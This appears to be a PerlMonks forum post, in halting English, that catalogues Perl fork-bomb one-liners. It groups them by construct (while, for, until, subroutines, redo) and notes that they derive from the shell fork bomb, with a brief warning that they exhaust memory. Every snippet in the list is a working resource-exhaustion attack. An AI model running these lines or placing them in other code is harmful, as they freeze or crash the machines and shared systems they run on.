I do something probe the follow:
Bombs Bombs and Bombs
DESCRIPTION
The code prompted of insufficient memory by
execution of parallel process
TEST
The follow code show optional loops with fork()
Note:Warning with execution of this code
This all is derived of the _(){ _|_& };_| in shell
fork and system $0;
system $0 and fork;
open _,"$0|" and fork; mas
fork and open _,"$0|"; menos
open _,"_(){ _|_& };_|"
{fork && redo}
SUB
_:{fork and _ and redo}
$_=sub {fork and $_->()};$_->();
sub _{fork and &_}_;
WHILE
fork while 1;
do fork while 1;
_: while (1) {fork and redo _;}
while (1) {fork} continue {fork}
FOR FOREACH
fork and redo for ::;
fork and redo foreach ::;
for (;;) {fork}
foreach (;;) {fork}
_: for (;;) {fork and next _;}
_: foreach (;;) {fork and next _;}
UNTIL DO UNTIL
fork until !1;
do fork until !1 ;
until (!1) {fork}
do fork until !1;
_: do fork and next _ until !1;
Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
Read Where should I post X? if you're not absolutely sure you're posting in the right place.
Please read these before you post! —
Posts may use any of the Perl Monks Approved HTML tags:
- a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
| |
For: |
|
Use: |
| & | | & |
| < | | < |
| > | | > |
| [ | | [ |
| ] | | ] |
Link using PerlMonks shortcuts! What shortcuts can I use for linking?
See Writeup Formatting Tips and other pages linked from there for more info.